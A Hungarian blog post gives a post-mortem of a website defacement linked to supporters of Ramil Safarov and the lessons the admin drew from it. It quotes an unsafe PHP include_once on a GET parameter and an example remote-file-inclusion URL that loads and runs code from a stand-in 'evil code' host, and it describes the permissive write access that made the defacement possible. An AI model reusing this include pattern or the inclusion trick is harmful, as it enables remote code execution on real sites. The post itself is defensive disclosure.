ramil safarov

Nos, Ramil Safarov egy érdekes ember. Azonkívül, hogy sokan láthattátok hasonlatosságát Csányi Sándor ünnepelt szinészünknel, egy örmény társának életét vette egy baltával. Ennek ellenére, vagy éppen ezért Azerbajdzsánban az Év Embere lett.

Weboldala három nyelven köszönti az olvasókat, köztük magyarul is. Ennek oka gondolom az, hogy tudomásom szerint még mindig nálunk van fogva tartva. Naprakész információval nem rendelkezem, pedig igyekeztem utánajárni a dolognak.

A dolgot szőnyeg alá seperhettük volna, s hallgathatnék a hibáinkról, de úgy érzem jobb ide leírni, hogy mi is, s Ti is tanulhassatok belőle.

És most akkor a technikai bla-bla. A deface-t három dolog együttállásának köszönhettük. Egy nem éppen biztonságos php include parancsot az egyik domainen, illetve két kényelmi szolgáltatást kihasználva sikerült elérni, hogy önakaratunkon kívül sikerült betársulnunk Ramil szabadításáért küzdők népes táborába.

"include_once($_GET[oldal]."_".$_SESSION[lang].".php");" kód tanult kollégám szerint kiváló lehetőséget nyújt a rosszindulatú emberünknek, hogy a index.php?oldal=http://oldalam.com/gonosz-kodom.php?semmi= szöveg címsorba írása után http://oldalam.com/gonosz-kodom.php?semmi=_hu.php -t inklúdolja (mi erre a szép magyar szó), s lefuttassa. (a domain, illetve a kód tulajdonosát értesítettük, hogy javítsa ki, távolítsa azt el az oldalról.)

Ezzel emberünk a webszerver jogaival tudott fájlokat létrehozni. S valóban tudott is, mert kényelmi okokból sok domainen biztosítottuk az írásjogot. És, hogy a dolog még szebb legyen egy nemrég felkerült domain kedvéért létezett egy aldomain, amivel a teljes wwwroot bejárható volt. (megszüntettük az írásjogot, mindenkinek magának kell ezután engedélyezni, ha szeretné, hogy fel tudjon tölteni, stb. Az aldomaint szintén megszüntettük)

Tanulság: Kiskaput nem nyitunk, vagy ha igen, azonnal bezárjuk. A dolog előnye viszont, hogy íly módon minden cms a legfrissebbre lett upgrade-elve, ezzel csökkentve egy következő akció sikerességét. Frissült a teljes rendszer, minden, ami lehetett.

És akkor a végére az állandó kérdés, hogy mi a helyes arány a biztonság és a használhatóság között?

Published by kobak

Koren Balázs, apa, tanár, geek. Ebben a sorrendben. Többnyire. A blogon többnyire ezekről a kalandjairól ír. Apaként, tanárként hogy lehet zöld ágra vergődni az oktatásban a digitális eszközökkel. Máskor pedig utazásról, sportokról, vagy egyéb őrült hobbijáról írogat.